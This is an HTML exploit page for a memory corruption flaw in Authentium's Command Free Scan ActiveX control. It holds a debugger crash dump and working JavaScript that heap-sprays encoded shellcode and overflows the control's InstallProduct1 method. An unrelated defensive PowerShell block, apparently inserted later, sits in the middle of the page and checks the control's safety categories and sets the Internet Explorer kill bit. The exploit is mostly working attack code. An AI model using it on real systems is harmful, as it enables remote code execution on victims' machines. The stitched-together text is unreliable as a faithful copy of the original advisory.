<html>
<body>
<pre>
<img src="http://sotiriu.de/images/logo_wh_80.png"><br>
<h2>Authentium Command Free Scan ActiveX Control Memory corruption Exploit</h2>
Author: Nikolas Sotiriu (lofi)
Advisory: http://www.sotiriu.de/adv/NSOADV-2010-xxx.txt
Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.
<input language=JavaScript onclick=shoot() type=button value="Rule#5 Shoot first"><br>
<h3>ActiveX Control Information:</h3>
Name:            CSS Web Installer Class
Prog ID:         CSSWEBLib.Installer
Vendor:          Authentium, Inc.
Type:            ActiveX-Control
Version:         1.4.9508.605
GUID:            {6CCE3920-3183-4B3D-808A-B12EB769DE12}
File:            cssweb.dll
Folder:          C:\WINDOWS\Downloaded Program Files\
Safe for Script: True
Safe for Init:   True
IObjectSafety:   False
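The control is marked safe for scripting and initialization through registry component categories rather than through IObjectSafety, which is why a web page can script it. The PowerShell below is an added defender-side check, not part of the original advisory: it reads those category registrations for the GUID above and sets the Internet Explorer kill bit (Compatibility Flags 0x400) so the control can no longer be instantiated from a page. The category GUIDs are the standard CATID_SafeForScripting and CATID_SafeForInitializing values; the control's registration under HKEY_CLASSES_ROOT\CLSID is assumed. Run it elevated.

```powershell
# Added example, not the advisory's code. CLSID taken from the advisory.
$clsid = '{6CCE3920-3183-4B3D-808A-B12EB769DE12}'

# Standard component categories a control can register itself under to claim
# "safe for scripting" / "safe for initializing" without implementing IObjectSafety.
$catIds = @{
    SafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
    SafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
}

$clsidKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid"   # assumed registration path
$killKey  = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
$KILL_BIT = 0x400

function Get-ControlSafetyStatus {
    # Reports whether the control is registered, which safety categories it claims,
    # and whether the IE kill bit is already set.
    $status = [ordered]@{ Registered = Test-Path $clsidKey }
    foreach ($name in $catIds.Keys) {
        $status[$name] = Test-Path "$clsidKey\Implemented Categories\$($catIds[$name])"
    }
    $flags = (Get-ItemProperty -Path $killKey -ErrorAction SilentlyContinue).'Compatibility Flags'
    $status.KillBitSet = (($flags -band $KILL_BIT) -eq $KILL_BIT)
    [pscustomobject]$status
}

function Set-ControlKillBit {
    # Sets the kill bit while preserving any other compatibility flags already present.
    if (-not (Test-Path $killKey)) { New-Item -Path $killKey -Force | Out-Null }
    $flags = (Get-ItemProperty -Path $killKey -ErrorAction SilentlyContinue).'Compatibility Flags'
    if (-not $flags) { $flags = 0 }
    Set-ItemProperty -Path $killKey -Name 'Compatibility Flags' `
        -Value ($flags -bor $KILL_BIT) -Type DWord
}

Get-ControlSafetyStatus   # before: Registered/SafeFor* True, KillBitSet False
Set-ControlKillBit
Get-ControlSafetyStatus   # after: KillBitSet True
```

The category check shows why "Safe for Script: True" appears in the advisory even though the control does not implement IObjectSafety; the kill bit is the vendor-independent way to block it until a fixed build is installed.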
<h3>Test Information:</h3>
- Windows XP SP3 IE7 Ger
<h3>M$ Exploitability Information</h3>
(158.968): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7efefefe ebx=02695140 ecx=02695180 edx=41414141 esi=02695140 edi=42424242
eip=1000c1a9 esp=0194b414 ebp=0194b4e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\Downloaded Program Files\cssweb.dll -
cssweb!DllUnregisterServer+0x37a3:
1000c1a9 8917            mov     dword ptr [edi],edx  ds:0023:42424242=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:005> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x42424242
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0x223e0447.0x22676030
Stack Trace:
cssweb!DllUnregisterServer+0x37a3
cssweb!DllUnregisterServer+0x22d8
mshtml!CFontCache::GetBaseCcs+0x1bd
mshtml!CStr::Set+0x1b
mshtml!COneRun::Clone+0x87
Instruction Address: 0x000000001000c1a9

Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at cssweb!DllUnregisterServer+0x00000000000037a3 (Hash=0x223e0447.0x22676030)
User mode write access violations that are not near NULL are exploitable.
</pre>
<object classid='clsid:6CCE3920-3183-4B3D-808A-B12EB769DE12' id='obj'></object>
<script language='javascript'>
shellcode = unescape( '%ub0ba%u8813%udbda%ud9d5%u2474%u5ef4%uc933%u33b1'+ '%u5631%u8312%ufcee%ue603%u6a1d%ufa2f%ue3ca%u02d0'+ '%u940b%ue759%u863a%u6c3e%u166e%u2034%udd83%ud018'+ '%u9310%ud7b4%u1e91%ud6e3%uaf22%ub42b%ub1e1%uc6d7'+ '%u1235%u09e9%u5348%u772e%u01a3%ufce7%ub616%u408c'+ '%ub7ab%ucf42%ucf93%u0fe7%u7a67%u5fe9%uf1d8%u47a1'+ '%u5d52%u7612%ubdb7%u316e%u76bc%uc004%u4714%uf3e5'+ '%u0458%u3cd8%u5455%ufa1c%u2386%uf956%u343b%u80ad'+ '%ub1e7%u2230%u6163%ud391%uf4a0%udf52%u720d%uc33c'+ '%u5790%uff36%u5619%u7699%u7d59%ud33d%u1c39%ub964'+ '%u21ec%u6576%u8450%u87fc%ube85%ucd5e%u3258%ua8e5'+ '%u4c5b%u9ae6%u7d33%u756d%u8243%u32a4%u73b5%uae75'+ '%u2a22%u93ec%ucd2e%ud7da%u4e56%ua7ef%u4eac%ua29a'+ '%uc8e9%ude76%ubd62%u4d78%u9482%u101a%u7410%ub7f3'+ '%u1f90%u410b');
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;
//Filling the header
while(nops.length< slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);
while( block.length+ slackspace<0x30000) block= block+ block+ fillblock;
//Creating the array.
memory=new Array();
//Filling the array with the nops + shellcode.
for( counter=0; counter<300; counter++) memory[counter]= block + shellcode;

//This is our RET
edx=unescape('%08%08%08%08');

ret='';
//Junk
for( counter=0; counter<=2075; counter++) ret+=unescape('%42');
//Build the pointer to our overwritten RET
//I know this looks strange but it was the only way i found to overcome
//the badchar problem (0x8E=>bad 0x94=>bad)
ret+=unescape('%18');
ret+="?; //%8E must be given in as unicode sign (beware of you editor)
ret+="?; //%95 must be given in as unicode sign (beware of you editor)
ret+=unescape('%01');
//Pointer is => 0x01948e18 from cssweb.dll
function shoot() {
    obj.InstallProduct1(edx,ret)
}
</script>
</body>
</html>